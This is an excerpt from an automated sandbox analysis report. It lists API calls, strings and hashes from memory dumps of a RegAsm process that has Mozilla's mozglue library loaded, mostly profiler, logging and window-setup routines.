                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: memset
                                                                            • String ID:
                                                                            • API String ID: 2221118986-0
                                                                            APIs
                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC87A81
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC87A93
                                                                              • Part of subcall function 6CC55C50: GetTickCount64.KERNEL32 ref: 6CC55D40
                                                                              • Part of subcall function 6CC55C50: EnterCriticalSection.KERNEL32(6CCBF688), ref: 6CC55D67
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CC87AA1
                                                                              • Part of subcall function 6CC55C50: __aulldiv.LIBCMT ref: 6CC55DB4
                                                                              • Part of subcall function 6CC55C50: LeaveCriticalSection.KERNEL32(6CCBF688), ref: 6CC55DED
                                                                            • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6CC87B31
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
                                                                            • String ID:
                                                                            • API String ID: 4054851604-0
                                                                            APIs
                                                                            • NtQueryVirtualMemory.NTDLL ref: 6CC9B720
                                                                            • RtlNtStatusToDosError.NTDLL ref: 6CC9B75A
                                                                            • RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,00000000,00000000,?,0000001C,6CC6FE3F,00000000,00000000,?,?,00000000,?,6CC6FE3F), ref: 6CC9B760
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Error$LastMemoryQueryStatusVirtualWin32
                                                                            • String ID:
                                                                            • API String ID: 304294125-0
                                                                            APIs
                                                                            • rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6CC403D4,?), ref: 6CC9B955
                                                                            • NtQueryVirtualMemory.NTDLL ref: 6CC9B9A5
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryQueryVirtualrand_s
                                                                            • String ID:
                                                                            • API String ID: 1889792194-0
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(user32,?,6CC6E1A5), ref: 6CC95606
                                                                            • LoadLibraryW.KERNEL32(gdi32,?,6CC6E1A5), ref: 6CC9560F
                                                                            • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6CC95633
                                                                            • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6CC9563D
                                                                            • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6CC9566C
                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6CC9567D
                                                                            • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6CC95696
                                                                            • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6CC956B2
                                                                            • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6CC956CB
                                                                            • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6CC956E4
                                                                            • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6CC956FD
                                                                            • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6CC95716
                                                                            • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6CC9572F
                                                                            • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6CC95748
                                                                            • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6CC95761
                                                                            • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6CC9577A
                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6CC95793
                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6CC957A8
                                                                            • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6CC957BD
                                                                            • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6CC957D5
                                                                            • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6CC957EA
                                                                            • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6CC957FF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$LibraryLoad
                                                                            • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                                                            • API String ID: 2238633743-1964193996
                                                                            APIs
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6CC4582D), ref: 6CC7CC27
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6CC4582D), ref: 6CC7CC3D
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6CCAFE98,?,?,?,?,?,6CC4582D), ref: 6CC7CC56
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6CC4582D), ref: 6CC7CC6C
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6CC4582D), ref: 6CC7CC82
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6CC4582D), ref: 6CC7CC98
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6CC4582D), ref: 6CC7CCAE
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6CC7CCC4
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6CC7CCDA
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6CC7CCEC
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6CC7CCFE
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6CC7CD14
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6CC7CD82
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6CC7CD98
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6CC7CDAE
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6CC7CDC4
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6CC7CDDA
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6CC7CDF0
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6CC7CE06
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6CC7CE1C
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6CC7CE32
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6CC7CE48
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6CC7CE5E
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6CC7CE74
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6CC7CE8A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: strcmp
                                                                            • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                            • API String ID: 1004003707-2809817890
                                                                            APIs
                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6CC44801
                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC44817
                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC4482D
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC4484A
                                                                              • Part of subcall function 6CC6AB3F: EnterCriticalSection.KERNEL32(6CCBE370,?,?,6CC33527,6CCBF6CC,?,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB49
                                                                              • Part of subcall function 6CC6AB3F: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC33527,6CCBF6CC,?,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6AB7C
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC4485F
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC4487E
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC4488B
                                                                            • free.MOZGLUE(?), ref: 6CC4493A
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC44956
                                                                            • free.MOZGLUE(00000000), ref: 6CC44960
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC4499A
                                                                              • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                              • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                            • free.MOZGLUE(?), ref: 6CC449C6
                                                                            • free.MOZGLUE(?), ref: 6CC449E9
                                                                              • Part of subcall function 6CC55E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC55EDB
                                                                              • Part of subcall function 6CC55E90: memset.VCRUNTIME140(6CC97765,000000E5,55CCCCCC), ref: 6CC55F27
                                                                              • Part of subcall function 6CC55E90: LeaveCriticalSection.KERNEL32(?), ref: 6CC55FB2
                                                                            Strings
                                                                            • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6CC447FC
                                                                            • [I %d/%d] profiler_shutdown, xrefs: 6CC44A06
                                                                            • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6CC44812
                                                                            • MOZ_PROFILER_SHUTDOWN, xrefs: 6CC44A42
                                                                            • MOZ_BASE_PROFILER_LOGGING, xrefs: 6CC44828
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$free$EnterLeavegetenv$CurrentExclusiveLockThread$AcquireInit_thread_footerReleasememset
                                                                            • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_SHUTDOWN$[I %d/%d] profiler_shutdown
                                                                            • API String ID: 1340022502-4194431170
                                                                            • Opcode ID: c3381fb728d657a909445ee7a91afa5542c2f4a8981e1473ae35045f146566d2
                                                                            • Instruction ID: 4528e45bac91a3110eb68051d6cd8346714f0730e06b1cc446e58ced7b74a6d5
                                                                            • Opcode Fuzzy Hash: c3381fb728d657a909445ee7a91afa5542c2f4a8981e1473ae35045f146566d2
                                                                            • Instruction Fuzzy Hash: B881F479A001008FDB00DFA9D89475A7775FF42328F24C629E916A7F41F731E895CBAA
                                                                            APIs
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF760), ref: 6CC419BD
                                                                            • GetCurrentProcess.KERNEL32 ref: 6CC419E5
                                                                            • GetLastError.KERNEL32 ref: 6CC41A27
                                                                            • moz_xmalloc.MOZGLUE(?), ref: 6CC41A41
                                                                            • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CC41A4F
                                                                            • GetLastError.KERNEL32 ref: 6CC41A92
                                                                            • moz_xmalloc.MOZGLUE(?), ref: 6CC41AAC
                                                                            • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CC41ABA
                                                                            • LocalFree.KERNEL32(?), ref: 6CC41C69
                                                                            • free.MOZGLUE(?), ref: 6CC41C8F
                                                                            • free.MOZGLUE(?), ref: 6CC41C9D
                                                                            • CloseHandle.KERNEL32(?), ref: 6CC41CAE
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF760), ref: 6CC41D52
                                                                            • GetLastError.KERNEL32 ref: 6CC41DA5
                                                                            • GetLastError.KERNEL32 ref: 6CC41DFB
                                                                            • GetLastError.KERNEL32 ref: 6CC41E49
                                                                            • GetLastError.KERNEL32 ref: 6CC41E68
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC41E9B
                                                                              • Part of subcall function 6CC42070: LoadLibraryW.KERNEL32(combase.dll,6CC41C5F), ref: 6CC420AE
                                                                              • Part of subcall function 6CC42070: GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6CC420CD
                                                                              • Part of subcall function 6CC42070: __Init_thread_footer.LIBCMT ref: 6CC420E1
                                                                            • memset.VCRUNTIME140(?,00000000,00000110), ref: 6CC41F15
                                                                            • VerSetConditionMask.NTDLL ref: 6CC41F46
                                                                            • VerSetConditionMask.NTDLL ref: 6CC41F52
                                                                            • VerSetConditionMask.NTDLL ref: 6CC41F59
                                                                            • VerSetConditionMask.NTDLL ref: 6CC41F60
                                                                            • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6CC41F6D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$ConditionMask$freememset$ExclusiveLockmoz_xmalloc$AcquireAddressCloseCurrentFreeHandleInfoInit_thread_footerLibraryLoadLocalProcProcessReleaseVerifyVersion
                                                                            • String ID: D
                                                                            • API String ID: 290179723-2746444292
                                                                            • Opcode ID: 895717a1f73ef8b452e90a911bde63b21506f9f5c2b01cfb6e98feee1f3c86d4
                                                                            • Instruction ID: b2d026e9837cb1b370bee3bbd4b60b3b97eaf70fdfa1789b7cc74fafcc677256
                                                                            • Opcode Fuzzy Hash: 895717a1f73ef8b452e90a911bde63b21506f9f5c2b01cfb6e98feee1f3c86d4
                                                                            • Instruction Fuzzy Hash: 07F1A3B1E00725AFEB109F65CC88B9AB7B8FF49704F108199E945A7640E774DD90CFA4
                                                                            APIs
                                                                              • Part of subcall function 6CC44730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6CC444B2,6CCBE21C,6CCBF7F8), ref: 6CC4473E
                                                                              • Part of subcall function 6CC44730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6CC4474A
                                                                            • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6CC444BA
                                                                            • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6CC444D2
                                                                            • InitOnceExecuteOnce.KERNEL32(6CCBF80C,6CC3F240,?,?), ref: 6CC4451A
                                                                            • GetModuleHandleW.KERNEL32(user32.dll), ref: 6CC4455C
                                                                            • LoadLibraryW.KERNEL32(?), ref: 6CC44592
                                                                            • InitializeCriticalSection.KERNEL32(6CCBF770), ref: 6CC445A2
                                                                            • moz_xmalloc.MOZGLUE(00000008), ref: 6CC445AA
                                                                            • moz_xmalloc.MOZGLUE(00000018), ref: 6CC445BB
                                                                            • InitOnceExecuteOnce.KERNEL32(6CCBF818,6CC3F240,?,?), ref: 6CC44612
                                                                            • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6CC44636
                                                                            • LoadLibraryW.KERNEL32(user32.dll), ref: 6CC44644
                                                                            • memset.VCRUNTIME140(?,00000000,00000114), ref: 6CC4466D
                                                                            • VerSetConditionMask.NTDLL ref: 6CC4469F
                                                                            • VerSetConditionMask.NTDLL ref: 6CC446AB
                                                                            • VerSetConditionMask.NTDLL ref: 6CC446B2
                                                                            • VerSetConditionMask.NTDLL ref: 6CC446B9
                                                                            • VerSetConditionMask.NTDLL ref: 6CC446C0
                                                                            • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6CC446CD
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 6CC446F1
                                                                            • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6CC446FD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                            • String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                            • API String ID: 1702738223-3894940629
                                                                            • Opcode ID: c4df8e3795961a23628eba3a7e3a71347c9e7869bfcf190ca36711acefcf5791
                                                                            • Instruction ID: 3e7a6c8b30bb29a77aa085271ec200a7b4c2a48b054c0c8ccb6636e1dfa86017
                                                                            • Opcode Fuzzy Hash: c4df8e3795961a23628eba3a7e3a71347c9e7869bfcf190ca36711acefcf5791
                                                                            • Instruction Fuzzy Hash: 2B6113B8A00248AFEB00CFE1CC49B957BB8EB46308F24C598E904AB751F7B19945CF55
                                                                            APIs
                                                                              • Part of subcall function 6CC77090: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,6CC7B9F1,?), ref: 6CC77107
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6CC7DCF5), ref: 6CC7E92D
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7EA4F
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EA5C
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EA80
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7EA8A
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6CC7DCF5), ref: 6CC7EA92
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7EB11
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EB1E
                                                                            • memset.VCRUNTIME140(?,00000000,000000E0), ref: 6CC7EB3C
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EB5B
                                                                              • Part of subcall function 6CC75710: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CC7EB71), ref: 6CC757AB
                                                                              • Part of subcall function 6CC6CBE8: GetCurrentProcess.KERNEL32(?,6CC331A7), ref: 6CC6CBF1
                                                                              • Part of subcall function 6CC6CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC331A7), ref: 6CC6CBFA
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                              • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7EBA4
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6CC7EBAC
                                                                              • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                              • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7EBC1
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8,?,?,00000000), ref: 6CC7EBCE
                                                                            • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6CC7EBE5
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8,00000000), ref: 6CC7EC37
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CC7EC46
                                                                            • CloseHandle.KERNEL32(?), ref: 6CC7EC55
                                                                            • free.MOZGLUE(00000000), ref: 6CC7EC5C
                                                                            Strings
                                                                            • [I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6CC7EA9B
                                                                            • [I %d/%d] profiler_start, xrefs: 6CC7EBB4
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ExclusiveLock$Current$ReleaseThread$Acquiregetenv$Process_getpid$?profiler_init@baseprofiler@mozilla@@CloseHandleInit_thread_footerObjectSingleTerminateWait__acrt_iob_func__stdio_common_vfprintffreemallocmemset
                                                                            • String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
                                                                            • API String ID: 1341148965-1186885292
                                                                            • Opcode ID: 92d745192a95e8bd1fec2b9da9d20eb111715bd3dbeffab84c153ca0725b3bf2
                                                                            • Instruction ID: b960cb37aa5d12f64546b49e9ebe4fd28ef9813aa94d18133e6ad8fc90e20c31
                                                                            • Opcode Fuzzy Hash: 92d745192a95e8bd1fec2b9da9d20eb111715bd3dbeffab84c153ca0725b3bf2
                                                                            • Instruction Fuzzy Hash: FCA1373A7006148FDB109FA8C494BAABBB5FF86318F14402DE91997F51FB709845CBB5
                                                                            APIs
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                              • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F70E
